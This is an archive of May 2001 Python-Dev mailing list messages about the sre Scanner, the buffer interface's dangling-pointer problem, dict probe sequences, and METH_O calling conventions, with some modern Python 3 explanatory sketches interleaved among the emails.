	foo(PyObject *self, PyObject *obj, int *i)
	bar(PyObject *self, int *i, int *j, char *txt, int *len)

To call these, the calling mechanism would have to cast these
to:

	foo(void *, void *, void *)
	bar(void *, void *, void *, void *, void *)

Wouldn't this work ?

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From paulp at ActiveState.com  Sat May 26 17:02:08 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Sat, 26 May 2001 08:02:08 -0700
Subject: [Python-Dev] Scanner
Message-ID: <3B0FC570.17707787@ActiveState.com>

What ever happened to the sre Scanner? It seemed like a good idea but it
was not documented and it doesn't work for me. Is it just a case of
nobody got around to the documentation or have we decided against it?

Here's the code that doesn't work for me:

from sre import Scanner

scanner = Scanner([
    (r"[a-zA-Z_]\w*", None),
    (r"\d+\.\d*", None),
    (r"\d+", None),
    (r"=|\+|-|\*|/", None),
    (r"\s+", None),
    ])

tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")

Traceback (most recent call last):
  File "junk.py", line 11, in ?
    tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
  File "c:\program files\python21\lib\sre.py", line 254, in scan
    action = self.lexicon[m.lastindex][1]
TypeError: sequence index must be integer

m.lastindex is None
-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From mal at lemburg.com  Sat May 26 17:47:47 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sat, 26 May 2001 17:47:47 +0200
Subject: [Python-Dev] strop vs. string
References: <LNBBLJKPBEHFEDALKOLCEEJEKEAA.tim.one@home.com>
Message-ID: <3B0FD023.C4588919@lemburg.com>

Tim Peters wrote:
> 
> The buffer object has been neglected for years:  is that because it's in
> prime shape, or because nobody cares about it enough to maintain it?  "The
> bug" has been known for years without any action taken to address it; the
> docs give up in spots and nobody addresses that either (like "The current
> policy seems to state that these characters may be multi-byte characters" --
> well, yes or no?); the builtin buffer() function isn't called anywhere in
> the std test suite; the file object still has an undocumented readinto()
> method that just confuses people who bump into it; and it's so obscure in
> daily life that it appears Guido didn't even think of it when adding
> iterators for the other sequence types.
> 
> I expect that answers my question <wink>.  Is someone (Greg? MAL?) going to
> champion it now?  That would be cool.

I believe that nobody really likes the buffer interface enough to
let the world know about it, except maybe Greg ;-)

Even the idea of replacing the usage of strings as data buffers
with buffer objects didn't get very far; common habits are simply
hard to break.

> About combining strop and buffers and strings, don't forget unicodeobject.c:
> that's got oodles of basically duplicate code too.  /F suggested dealing
> with the minor differences via maintaining one code file that gets compiled
> multiple times w/ appropriate #defines.

Hmm, that only saves us a few kB in source, but certainly not
in the object files. 

The better idea would be making the types subclass from a generic 
abstract string object -- I just don't know how this will be 
possible with Guido's type patches. We'll just have to wait, 
I guess.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Sat May 26 23:15:11 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 26 May 2001 17:15:11 -0400
Subject: [Python-Dev] Scanner
In-Reply-To: <3B0FC570.17707787@ActiveState.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEKJKEAA.tim.one@home.com>

[Paul Prescod]
> What ever happened to the sre Scanner? It seemed like a good idea
> but it was not documented

I previously urged /F to document, and Python-Dev to accept, the .lastindex
and .lastgroup match object extensions, but to date <wink> got no response.
Whether to adopt the Scanner class too is fuzzier, since AFAICT almost
nobody has figured out how to use it.

> and it doesn't work for me.

This isn't a code problem, it's a failure to reverse-engineer the
undocumented API <wink>.

> Is it just a case of nobody got around to the documentation or have
> we decided against it?

WRT Scanner, partly the former, nothing of the latter, mostly that there's
been no discussion of the API at all.

WRT lastindex and lastgroup, I think purely the former.

> Here's the code that doesn't work for me:
>
> from sre import Scanner
>
> scanner = Scanner([
>     (r"[a-zA-Z_]\w*", None),
>     (r"\d+\.\d*", None),
>     (r"\d+", None),
>     (r"=|\+|-|\*|/", None),
>     (r"\s+", None),
>     ])

1. Every tokenization regexp must contain exactly one capturing group.
   The lack above is the source of your later TypeError.  Unclear to
   me whether that was the intent, or just the way the code happens to
   work today.

2. When an action is None, the substring matched by the pattern will
   be thrown away.  You need to supply non-None actions if you want
   anything to show up in the token list.

> tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
>
> Traceback (most recent call last):
>   File "junk.py", line 11, in ?
>     tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
>   File "c:\program files\python21\lib\sre.py", line 254, in scan
>     action = self.lexicon[m.lastindex][1]
> TypeError: sequence index must be integer
>
> m.lastindex is None

Here's a working rewrite:

from sre import Scanner

def retrieve(scanner, group):
    return group

scanner = Scanner([
    (r"([a-zA-Z_]\w*)", retrieve),
    (r"(\d+\.\d*)", retrieve),
    (r"(\d+)", retrieve),
    (r"(=|\+|-|\*|/)", retrieve),
    (r"(\s+)", None),  # ignore whitespace
    ])

tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
print tokens, `tail`

That prints

['sum', '=', '3', '*', 'foo', '+', '312.50', '+', 'bar'] ''
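For comparison, the same tokenization can be done without Scanner, using only documented `re` features in current Python 3. The approach is one alternation of named groups, with the match object's `lastgroup` attribute (one of the extensions Tim wants documented) saying which alternative matched. This is a sketch: the token names are made up. Like Scanner, it stops at the first character no pattern matches and returns the rest as the tail.

```python
import re

# Order matters: FLOAT must come before INT so "312.50" isn't split.
TOKEN_SPEC = [
    ("NAME", r"[a-zA-Z_]\w*"),
    ("FLOAT", r"\d+\.\d*"),
    ("INT", r"\d+"),
    ("OP", r"=|\+|-|\*|/"),
    ("SKIP", r"\s+"),  # whitespace: matched, then thrown away
]
MASTER = re.compile("|".join("(?P<%s>%s)" % pair for pair in TOKEN_SPEC))


def scan(text):
    """Return (tokens, tail), where tail is the unmatched remainder."""
    tokens = []
    pos = 0
    while pos < len(text):
        m = MASTER.match(text, pos)
        if m is None:
            break
        if m.lastgroup != "SKIP":
            tokens.append(m.group())
        pos = m.end()  # every pattern consumes at least one character
    return tokens, text[pos:]


tokens, tail = scan("sum = 3*foo + 312.50 + bar")
print(tokens, repr(tail))
# ['sum', '=', '3', '*', 'foo', '+', '312.50', '+', 'bar'] ''
```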


In return for that, how about *you* supply a works-on-Windows rewrite of
test_urllib2.py?  You know more about that than anyone, and the test has
been failing for weeks.


From MarkH at ActiveState.com  Sun May 27 04:39:43 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Sun, 27 May 2001 12:39:43 +1000
Subject: [Python-Dev] strop vs. string
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEJEKEAA.tim.one@home.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPKEBIDOAA.MarkH@ActiveState.com>

[Tim]
> The buffer object has been neglected for years:  is that because it's in
> prime shape, or because nobody cares about it enough to maintain it?

My take is a little different.  I think people could be convinced to care
about it, and indeed I do.  However, it has one fatal flaw, and no one seems
to know what to do about it.

The problem is the one best demonstrated with the array module - if you get
a pointer to the buffer interface for an array object, but the array then
resizes itself, the buffer pointer dangles.

There have been a few attempts over time to raise the buffer profile, but
this design flaw leaves people scratching their head - it is hard to press
for adoption of a feature that has a known crash hiding away.

However, addressing this problem is difficult.  Guido appears unconvinced
that buffer objects and interfaces are that worthwhile.  It appears no one
else knows how to proceed in the face of this ambivalence - that describes
my take even if no one else's.

The-buffer-is-dead,-long-live-the-buffer ly,

Mark.


From tim.one at home.com  Sun May 27 08:34:53 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 02:34:53 -0400
Subject: [Python-Dev] Next dict crusade
Message-ID: <LNBBLJKPBEHFEDALKOLCKELEKEAA.tim.one@home.com>

I'm still trying to work off the backlog of ignored dict ideas.  Way back
here:

    http://mail.python.org/pipermail/python-dev/2000-December/011085.html

Christian Tismer suggested using polynomial division instead of
multiplication for generating the probe sequence, as a way to get all the
bits of the hash code into play.  The desirability of doing that is
illustrated by, e.g., this program:

def f(keys):
    from time import clock

    d = {}

    s = clock()
    for k in keys:
        d[k] = k
    f = clock()
    print "build time %.3f" % (f-s)

    s = clock()
    for k in keys:
        assert d.has_key(k)
    f = clock()
    print "search time %.3f" % (f-s)

# Excellent performance.
keys = range(20000)
for i in range(5):
    f(keys)

# Terrible performance; > 500x slower.
keys = [i << 16 for i in range(20000)]
for i in range(5):
    f(keys)
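The shifted keys hurt because of how the first slot and initial increment are computed. The following Python 3 sketch computes both for each key, taking the increment as hash ^ (hash >> 3) and masked the way Tim says the current code does. It assumes a table of 2**15 slots and relies on a small int hashing to itself. It ignores whatever the real dictobject.c does with a zero increment.

```python
MASK = 2**15 - 1  # assumption: a 32768-slot table


def first_probe(h, mask=MASK):
    """Return (initial slot, initial increment), increment masked."""
    return h & mask, (h ^ (h >> 3)) & mask


def distinct_probes(keys):
    """Count distinct initial slots and distinct initial increments."""
    probes = [first_probe(hash(k)) for k in keys]
    return len({s for s, _ in probes}), len({i for _, i in probes})


print(distinct_probes(range(20000)))                     # (20000, 20000)
print(distinct_probes([i << 16 for i in range(20000)]))  # (1, 4)
```

With the mask applied, only the low 15 bits of the hash matter. The 20000 shifted keys therefore all start in the same slot and share just four probe sequences.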

Christian had a very clever (cheap and effective) solution:

    Old algorithm (multiplication):
        shift the index left by 1
        if index > mask:
            xor the index with the generator polynomial

    New algorithm (division):
        if low bit of index set:
            xor the index with the generator polynomial
        shift the index right by 1

where "index" should really read "increment", and unlike today we do not
mask off any of the bits of the initial increment (and that's what lets
*all* the bits of the hash code come into play; there's no point to doing
this otherwise).

I've since discovered that it's got a fatal rare flaw:  the new algorithm
can generate a 0 increment, while the old algorithm cannot.

Example:  poly is 131 and hash is 145.  Because we don't mask off any bits
in computing the initial increment, the initial increment is computed as

    incr = hash ^ (hash >> 3) ==
           145 ^ (145 >> 3) ==
           145 ^ 18 ==
           131 ==
           poly

So if we don't hit on the first probe, the new

        if low bit of index set:
            xor the index with the generator polynomial
        shift the index right by 1

business sets incr to 0, and the result is an infinite loop (0 is a fixed
point).  I hate to add another branch to this.  As is, the existing branch
in both the old and new ways is of the worst possible kind:  it's taken half
the time, with a pseudo-random distribution.  So there's not a
branch-prediction gimmick on earth it won't fool.
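Here is a small Python model of the two increment updates, using the numbers from the example: poly 131, i.e. x**7 + x + 1. I'm assuming that poly goes with a 128-slot table (mask 127). The model shows that the old update never produces 0 from a nonzero start, while the new update gets stuck at 0 once the unmasked increment equals poly. The function names are hypothetical.

```python
POLY = 131  # generator polynomial from the example above
MASK = 127  # assumption: 128-slot table


def old_step(incr, mask=MASK, poly=POLY):
    """Multiplication by x: shift left, reduce when we overflow mask."""
    incr <<= 1
    if incr > mask:
        incr ^= poly
    return incr


def new_step(incr, poly=POLY):
    """Division by x: reduce if the low bit is set, then shift right."""
    if incr & 1:
        incr ^= poly
    return incr >> 1


def orbit(step, incr, n):
    """The first n increments produced by repeatedly applying step."""
    seen = []
    for _ in range(n):
        incr = step(incr)
        seen.append(incr)
    return seen


h = 145
incr = h ^ (h >> 3)  # initial increment, deliberately not masked
print(incr)                      # 131, equal to POLY
print(orbit(new_step, incr, 3))  # [0, 0, 0]: stuck at the fixed point
# From a nonzero start the old step cycles through every nonzero value < 128.
print(sorted(set(orbit(old_step, 1, 127))) == list(range(1, 128)))  # True
```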

Note that there's no reasonable way to identify "bad values" for incr before
the loop starts, either -- there's really no way to tell whether incr mod
poly is 0 without a loop to do division steps until incr < poly (if incr <
poly and incr != 0, incr can never become 0, so there's no more need to test
after reaching that point).  Such a "pre loop" would cost more than the
existing loop in most cases, as we usually get out of the existing loop
today on its first iteration.

But in that case, what am I worried about <wink>?

time-for-a-checkin-ly y'rs  - tim


From martin at loewis.home.cs.tu-berlin.de  Sun May 27 11:01:14 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 27 May 2001 11:01:14 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B0F7D44.1A12CE0F@lemburg.com> (mal@lemburg.com)
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com>
Message-ID: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>

> To call these, the calling mechanism would have to cast these
> to:
> 
> 	foo(void *, void *, void *)
> 	bar(void *, void *, void *, void *, void *)
> 
> Wouldn't this work ?

I think it would work, but I doubt it would save much compared to the
existing approach. The main point of this patch is to improve
efficiency, and (according to Jeremy's analysis), most of the time for
calling a function is spent in PyArg_ParseTuple. So if we replace it
with another interface that also relies on parsing a string, I doubt
we'll improve efficiency.

IOW, I won't implement that approach. If you do, I'd be curious to
hear the results, of course.

Regards,
Martin

P.S. There would still be cases where PyArg_ParseTuple is needed,
e.g. for "O!".


From mal at lemburg.com  Sun May 27 12:26:27 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 27 May 2001 12:26:27 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
Message-ID: <3B10D653.4D81E280@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > To call these, the calling mechanism would have to cast these
> > to:
> >
> >       foo(void *, void *, void *)
> >       bar(void *, void *, void *, void *, void *)
> >
> > Wouldn't this work ?
> 
> I think it would work, but I doubt it would save much compared to the
> existing approach. The main point of this patch is to improve
> efficiency, and (according to Jeremy's analysis), most of the time for
> calling a function is spent in PyArg_ParseTuple. So if we replace it
> with another interface that also relies on parsing a string, I doubt
> we'll improve efficiency.

That's the point: we are not replacing PyArg_ParseTuple()
with another parsing mechanism, we are only using PyArg_ParseTuple()
as a fallback for parser strings for which we don't
provide a special case implementation.

The idea is to simply do a strcmp() (*) for a few common
combinations (e.g. "O" and "OO") and then provide the
same special-case handling as you do with METH_O.
The result would be almost the same w/r to performance
and code reduction as with your approach. The only addition
would be using strcmp() instead of a switch statement.

The advantage of this approach is that while you can still
provide special case handling of common parser strings, you
can also provide generic APIs for most other parser strings
by reverting to PyArg_ParseTuple() for these.
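MAL's proposal can be modelled in a few lines of Python. The parser string is looked up in a small table of special cases, which stands in for the strcmp() checks, and a generic parser is used only when there is no entry. Everything here is hypothetical: `dispatch`, `FAST_PATHS` and `generic_parse` are made-up names. `generic_parse` understands only the single-character "O" and "i" codes, so nothing like "O!" or "s#".

```python
def check_count(fmt, args):
    # Only single-character codes are modelled, so len(fmt) == arity.
    if len(args) != len(fmt):
        raise TypeError("expected %d argument(s), got %d"
                        % (len(fmt), len(args)))


def as_int(value):
    if not isinstance(value, int):
        raise TypeError("an integer is required")
    return value


CONVERTERS = {"O": lambda value: value, "i": as_int}


def generic_parse(fmt, args):
    """Slow path standing in for PyArg_ParseTuple(): one code per arg."""
    check_count(fmt, args)
    return [CONVERTERS[code](value) for code, value in zip(fmt, args)]


# Special cases for common parser strings: no per-argument conversion loop.
FAST_PATHS = {
    "O": lambda func, args: func(args[0]),
    "OO": lambda func, args: func(args[0], args[1]),
}


def dispatch(func, fmt, args):
    fast = FAST_PATHS.get(fmt)  # plays the role of the strcmp() checks
    if fast is not None:
        check_count(fmt, args)
        return fast(func, args)
    return func(*generic_parse(fmt, args))


print(dispatch(len, "O", ("spam",)))              # fast path: 4
print(dispatch(lambda a, b: a + b, "ii", (2, 3)))  # fallback: 5
```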

> IOW, I won't implement that approach. If you do, I'd be curious to
> hear the results, of course.

I'll see what I can do...

> P.S. There would be still cases where PyArg_ParseTuple is needed,
> e.g. for "O!".

True... can't win 'em all ;-)

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Sun May 27 12:30:48 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 27 May 2001 12:30:48 +0200
Subject: [Python-Dev] strop vs. string
References: <LCEPIIGDJPKCOIHOBJEPKEBIDOAA.MarkH@ActiveState.com>
Message-ID: <3B10D758.3741AC2F@lemburg.com>

Mark Hammond wrote:
> 
> [Tim]
> > The buffer object has been neglected for years:  is that because it's in
> > prime shape, or because nobody cares about it enough to maintain it?
> 
> My take is a little different.  I think people could be convinced to care
> about it, and indeed I do.  However, it has one fatal flaw, and no one seems
> to know what to do about it.
> 
> The problem is the one best demonstrated with the array module - if you get
> a pointer to the buffer interface for an array object, but the array then
> resizes itself, the buffer pointer dangles.

I guess there are three ways to "solve" this:

a) mutable types don't implement the getreadbuf interface

b) the getreadbuf interface is complemented with a callback
   interface, so that the buffer object can be notified of
   the change

c) calling getreadbuf on a mutable object causes this object
   to become immutable
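For comparison, Python 3's buffer protocol ended up with something close to (c), applied only while a buffer is exported. A resizable object with live exports refuses to resize instead of leaving a dangling pointer. Writes that don't change the size are still allowed, so this is narrower than making the object immutable. Below is a short Python 3 sketch using bytearray and array.array. `try_resize` is a hypothetical helper.

```python
from array import array


def try_resize(obj):
    """Append one item; report whether a live buffer export blocked it."""
    try:
        obj.append(0)
        return "resized"
    except BufferError:
        return "blocked"


for obj in (bytearray(b"abc"), array("i", [1, 2, 3])):
    view = memoryview(obj)  # export a buffer, roughly like getreadbuf
    print(type(obj).__name__, try_resize(obj))  # blocked
    view.release()          # drop the export
    print(type(obj).__name__, try_resize(obj))  # resized
```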

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jeremy at digicool.com  Sun May 27 20:51:26 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Sun, 27 May 2001 14:51:26 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
	<3B0E1E2C.4BC121B5@lemburg.com>
	<200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>
	<3B0ED0C7.F1A665EA@lemburg.com>
	<200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>
	<3B0F7D44.1A12CE0F@lemburg.com>
	<200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
Message-ID: <15121.19630.329909.482775@slothrop.digicool.com>

>>>>> "MvL" == Martin v Loewis <martin at loewis.home.cs.tu-berlin.de> writes:

  MvL> to the existing approach. The main point of this patch is to
  MvL> improve efficiency, and (according to Jeremy's analysis), most
  MvL> of the time for calling a function is spent in
  MvL> PyArg_ParseTuple.

I'd like to qualify this a bit.  What I reported earlier is that the
BuiltinFunctionCalls microbenchmark in pybench spends 30% of its time in
PyArg_ParseTuple().  This strikes me as excessive, because it's a
static property of the code.  (One could imagine writing a Python
script that parsed the "O!|is#" format strings and generated
efficient, specialized C code for that format.)

If we benchmark other programs, particularly those that do more work
in the builtins, the relative cost of the argument processing will be
lower.

Jeremy


From jeremy at digicool.com  Sun May 27 20:55:36 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Sun, 27 May 2001 14:55:36 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEJHKEAA.tim.one@home.com>
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
	<LNBBLJKPBEHFEDALKOLCGEJHKEAA.tim.one@home.com>
Message-ID: <15121.19880.775931.946049@slothrop.digicool.com>

>>>>> "TP" == Tim Peters <tim.one at home.com> writes:

  TP> Do METH_O, convert every "O" function to use it, declare
  TP> victory, and enjoy the weekend <wink>.

  TP> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
  TP>     size-ly y'rs - tim

How is METH_O different than METH_OLDARGS?  

The old-style argument passing is definitely the most efficient for
functions of zero or one arguments.  There's special-case code in
ceval to support these cases -- fast_cfunction() -- primarily
because in these cases the function can be invoked by using arguments
directly from the Python stack instead of copying them to a tuple
first.

Jeremy


From tim.one at home.com  Sun May 27 22:37:43 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 16:37:43 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <15121.19880.775931.946049@slothrop.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEMIKEAA.tim.one@home.com>

[Jeremy]
> How is METH_O different than METH_OLDARGS?

I have no idea:  can you explain it?  The #define's for these symbols are
uncommented, and it's a mystery to me what they're *supposed* to mean.

> The old-style argument passing is definitely the most efficient for
> functions of zero or one arguments.  There's special-case code in
> ceval to support these cases -- fast_cfunction() -- primarily
> because in these cases the function can be invoked by using arguments
> directly from the Python stack instead of copying them to a tuple
> first.

OK, I'm looking in bltinmodule.c, at builtin_len.  It starts like so:

static PyObject *
builtin_len(PyObject *self, PyObject *args)
{
	PyObject *v;
	long res;

	if (!PyArg_ParseTuple(args, "O:len", &v))
		return NULL;

So it's clearly expecting a tuple.  But its entry in the builtin_methods[]
table is:

	{"len",		builtin_len, 1, len_doc},

That is, it says nothing about the calling convention.  Since C fills in a 0
for missing values, and methodobject.c has

/* Flag passed to newmethodobject */
#define METH_OLDARGS  0x0000
#define METH_VARARGS  0x0001
#define METH_KEYWORDS 0x0002

then doesn't the struct for builtin_len implicitly specify METH_OLDARGS?  But
if that's true, and fast_cfunction() does not create a tuple in this case,
how is it that builtin_len gets a tuple?

Something doesn't add up here.  Or does it?  There's no *reference* to
METH_OLDARGS anywhere in the code base other than its definition and its use
in method tables, so whatever code *keys* off it must be assuming a
hardcoded 0 value for it -- or indeed nothing keys off it at all.

I expect this line in ceval.c is doing the dirty assumption:

			    } else if (flags == 0) {

and should be testing against METH_OLDARGS instead.

But I see that builtin_len is falling into the METH_VARARGS case even though
it wasn't declared that way and it sure looks like METH_OLDARGS
(0) is the default.  Confusing!  Fix it <wink>.


From tim.one at home.com  Sun May 27 22:46:29 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 16:46:29 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEMIKEAA.tim.one@home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEMIKEAA.tim.one@home.com>

[Tim, thrashing]
> ...
> So it's clearly expecting a tuple.  But its entry in the builtin_methods[]
> table is:
>
> 	{"len",		builtin_len, 1, len_doc},
>
> That is, it says nothing about the calling convention.

Oops, it does, using a hardcoded 1 instead of the METH_VARARGS #define.  So
that explains that.

Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is there
some advantage to using METH_VARARGS in this case?  This gets back to what
these #defines are intended to *mean*, and I still haven't figured that out.


From mwh at python.net  Sun May 27 23:32:48 2001
From: mwh at python.net (Michael Hudson)
Date: Sun, 27 May 2001 22:32:48 +0100 (BST)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEMIKEAA.tim.one@home.com>
Message-ID: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>

On Sun, 27 May 2001, Tim Peters wrote:

> Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is
> there some advantage to using METH_VARARGS in this case?

So you can't do

>>> len(1,2)
2

a la list.append, socket.connect pre 2.0?  (or was it 1.6?)

My impression is that generally METH_VARARGS is saner than METH_OLDARGS
(ie. more consistent).  It seems the proposed METH_O is basically
METH_OLDARGS + the restriction that there is in fact only one argument, so
we save a tuple allocation over METH_VARARGS, but get argument count
checking over METH_OLDARGS.
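Michael's summary can be made concrete with a toy Python model of the three conventions. It is based on how the thread describes them plus my reading of the C dispatch, so treat it as an approximation. The helper names are hypothetical, and the real dispatch lives in C. Under METH_OLDARGS a single argument is passed bare and several are packed into a tuple, so the callee can't tell len(1, 2) from len((1, 2)). METH_O passes the one object straight through but checks the count. METH_VARARGS always builds a tuple for the callee to parse.

```python
def call_oldargs(func, args):
    """METH_OLDARGS model: none -> None, one -> bare object, many -> tuple."""
    if len(args) == 0:
        return func(None)
    if len(args) == 1:
        return func(args[0])
    return func(tuple(args))


def call_varargs(func, args):
    """METH_VARARGS model: always hand the callee a fresh tuple to parse."""
    return func(tuple(args))


def call_o(func, args):
    """METH_O model: exactly one object, passed without building a tuple."""
    if len(args) != 1:
        raise TypeError("function takes exactly 1 argument (%d given)"
                        % len(args))
    return func(args[0])


def varargs_len(args):
    """A VARARGS-style callee unpacks its own tuple (PyArg_ParseTuple's job)."""
    if len(args) != 1:
        raise TypeError("len() takes exactly 1 argument")
    return len(args[0])


# A len() written against METH_OLDARGS accepts both spellings:
print(call_oldargs(len, (1, 2)))     # 2, as if len(1, 2) were legal
print(call_oldargs(len, ((1, 2),)))  # 2, i.e. len((1, 2))
print(call_varargs(varargs_len, ((1, 2),)))  # 2
print(call_o(len, ((1, 2),)))                # 2
```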

Cheers,
M.


From tim.one at home.com  Mon May 28 00:49:38 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 18:49:38 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEMOKEAA.tim.one@home.com>

[Tim]
> Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is
> there some advantage to using METH_VARARGS in this case?

[Michael Hudson]
> So you can't do
>
> >>> len(1,2)
> 2
>
> a la list.append, socket.connect pre 2.0?  (or was it 1.6?)

If I didn't know better, I'd suspect Python's internal calling conventions
at the start didn't perfectly anticipate all future developments.  Among
other things, looks like it's impossible for a METH_OLDARGS function to
distinguish between being called with more than one argument and being
called with a single tuple argument.
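The ambiguity can be reproduced with a few lines modelling the METH_OLDARGS rule (one argument passed bare, several packed into a tuple). `oldargs_pack` is a hypothetical name used only for this illustration.

```python
def oldargs_pack(*args):
    # METH_OLDARGS rule as modelled here: a single argument is handed
    # over unchanged, several are handed over as one tuple.
    if len(args) == 1:
        return args[0]
    if len(args) == 0:
        return None  # stands in for a C NULL
    return args


# Two different calls from Python...
two_args = oldargs_pack(1, 2)      # like f(1, 2)
one_tuple = oldargs_pack((1, 2))   # like f((1, 2))

# ...reach the callee as equal tuples, so it cannot tell them apart.
print(two_args == one_tuple)  # True
```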

> My impression is that generally METH_VARARGS is saner than METH_OLDARGS
> (i.e. more consistent).

Yes, METH_OLDARGS does appear to, well, suck.

> It seems the proposed METH_O is basically METH_OLDARGS + the
> restriction that there is in fact only one argument, so we save
> a tuple allocation over METH_VARARGS,

Also, and more importantly, save the PyArg_ParseTuple call on the receiving
end.

> but get argument count checking over METH_OLDARGS.

Which is worth getting.  I'm back to where I started here:

Do METH_O, convert every "O" function to use it, declare victory, and enjoy
the weekend.

1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
    size-ly y'rs  - tim


PS:  But today I'll add another:  add at least one comment to the code --
this stuff is a bitch to reverse-engineer.


From thomas at xs4all.net  Mon May 28 00:50:58 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 00:50:58 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>; from mwh@python.net on Sun, May 27, 2001 at 10:32:48PM +0100
References: <LNBBLJKPBEHFEDALKOLCGEMIKEAA.tim.one@home.com> <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>
Message-ID: <20010528005058.H690@xs4all.nl>

On Sun, May 27, 2001 at 10:32:48PM +0100, Michael Hudson wrote:
> On Sun, 27 May 2001, Tim Peters wrote:

> > Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is
> > there some advantage to using METH_VARARGS in this case?

> So you can't do

> >>> len(1,2)
> 2

> a la list.append, socket.connect pre 2.0?  (or was it 1.6?)

And don't forget the method-specific error message by passing ':len' in the
format string. Of course, this can easily be (and probably should be) done by
passing another argument to whatever parses arguments in METH_O, rather than
invoking string parsing magic every call.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From thomas at xs4all.net  Mon May 28 00:58:30 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 00:58:30 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEMOKEAA.tim.one@home.com>; from tim.one@home.com on Sun, May 27, 2001 at 06:49:38PM -0400
References: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain> <LNBBLJKPBEHFEDALKOLCOEMOKEAA.tim.one@home.com>
Message-ID: <20010528005830.I690@xs4all.nl>

On Sun, May 27, 2001 at 06:49:38PM -0400, Tim Peters wrote:

> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
>     size-ly y'rs  - tim

And recycle a quote a day ;)

> PS:  But today I'll add another:  add at least one comment to the code --
> this stuff is a bitch to reverse-engineer.

But not just any comment, please! The Pine source code is riddled with calls
to 'mm_critical(stream)', and each call I've seen so far is nicely commented
with the utterly useless comment '/* go critical */'.

I'd-gladly-trade-in-every-mm_critical-comment-for-one-comment-to-describe-
 -what-Pine-actually-tries-to-do-ly y'rs,

